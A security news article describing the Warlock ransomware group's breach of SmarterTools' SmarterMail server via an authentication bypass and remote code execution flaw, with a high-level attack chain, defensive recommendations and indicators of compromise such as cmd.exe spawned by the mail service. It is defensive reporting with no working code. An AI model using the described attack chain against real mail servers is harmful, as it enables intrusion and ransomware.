SmarterTools’ SmarterMail email server breached by the Warlock ransomware group

SmarterTools’ SmarterMail email server was breached by the Warlock ransomware group after attackers exploited unpatched vulnerabilities in the software. If you’re part of the security teams at your company, you should unnderstand how this compromise unfolded, the vulnerabilities involved, and the enterprise risk implications for mail server deployments worldwide.

The breach occurred on January 29, 2026, when an employee-managed SmarterMail instance that was not updated to the latest secure build was compromised.

BEST WINTER DEALS

Editor's Choice

Private Internet Access

Access content across the globe at the highest speed rate.

70% of our readers choose Private Internet Access

70% of our readers choose ExpressVPN

ExpressVPN

Browse the web from multiple devices with industry-standard security protocols.

Nord VPN

Faster dedicated servers for specific actions (currently at summer discounts)

From that foothold, attackers moved laterally into SmarterTools’ internal network, impacting Windows servers and staging ransomware activities.

“At the data center, we hosted our Portal as well as our Hosted SmarterTrack network, which was connected via Active Directory,” Derek Curtis, who works at SmarterTools, explained in a security report. “We didn’t see much affected there and, out of an abundance of caution, we restored some of those servers from the most recent backup, which was six hours old.”

How the Warlock Ransomware Breach Unfolded

The attack began with targeting internet-facing SmarterMail instances that were missing recent security patches. Two critical vulnerabilities have been confirmed as exploited or targeted during the breach: CVE-2026-23760 and CVE-2026-24423.

CVE-2026-23760 (Authentication Bypass):

This flaw allows an unauthenticated attacker to reset the SmarterMail system administrator password by abusing the password reset API without providing the old password or a valid token. Success on this vulnerability grants administrative control over the mail software and, indirectly, full system control on the host server.

CVE-2026-24423 (Remote Code Execution):

This issue affects the ConnectToHub API and can result in full remote code execution on vulnerable SmarterMail servers. An attacker can send crafted API requests to execute arbitrary code without authorization.

Both vulnerabilities were fixed in SmarterMail build 9511 and later releases. However, servers that were not patched before the Warlock breach remained exposed.

Attack Chain and Enterprise Risk

The Warlock breach highlights a multi-stage attack chain rather than a single point of compromise. The sequence typically observed in this incident includes:

1. Initial Access Attackers exploited an unpatched SmarterMail instance using CVE-2026-23760 or CVE-2026-24423.
2. Privilege Escalation After gaining admin control of SmarterMail, the attackers leveraged built-in features like the “Volume Mount” to escalate to full server control.
3. Persistence and Reconnaissance Legitimate tools, such as Velociraptor (an open-source forensics and monitoring application), were installed to maintain persistence and blend with normal activity.
4. Lateral Movement and Staging Attackers then moved laterally into other Windows servers via Active Directory and staged for eventual ransomware deployment.
5. Potential Encryption Phase In this case, endpoint security products reportedly blocked full encryption, but the intent and vectors for ransomware execution were clearly present.

Enterprise Risk Considerations

• Unpatched software remains the top risk vector in ransomware incidents.
• Internet-facing infrastructure like mail servers is frequently probed by automated scanning tools and threat actors.
• Abuse of legitimate administrative features (Volume Mount, reset APIs) reduces detection chances and can disguise malicious behavior as normal operations.
• Persistence with trusted software (like Velociraptor) further complicates detection and remediation.

Recommended Security Measures

To reduce risk from similar attacks, organizations should take the following steps:

• Patch Immediately: Upgrade all SmarterMail instances to the latest secure build (9511 or newer).
• Isolate Mail Servers: Place servers in segmented networks (DMZ) and restrict access to only required protocols.
• Harden Administrative Interfaces: Limit exposure of API endpoints and apply strict authentication and monitoring.
• Monitor Suspicious Activity: Alert on unusual API calls, password resets, mount operations, and the execution of administrative tools.
• Restrict Outbound Traffic: Block all unnecessary outbound connections to prevent command-and-control callbacks.

Common Indicators of Compromise (IOCs)

• Successful use of SmarterMail password reset API from unknown sources.
• Unexpected Velociraptor service installations.
• Command shell (cmd.exe) spawned by SmarterMail service.
• MSI installers downloaded from third-party hosts (e.g., Supabase).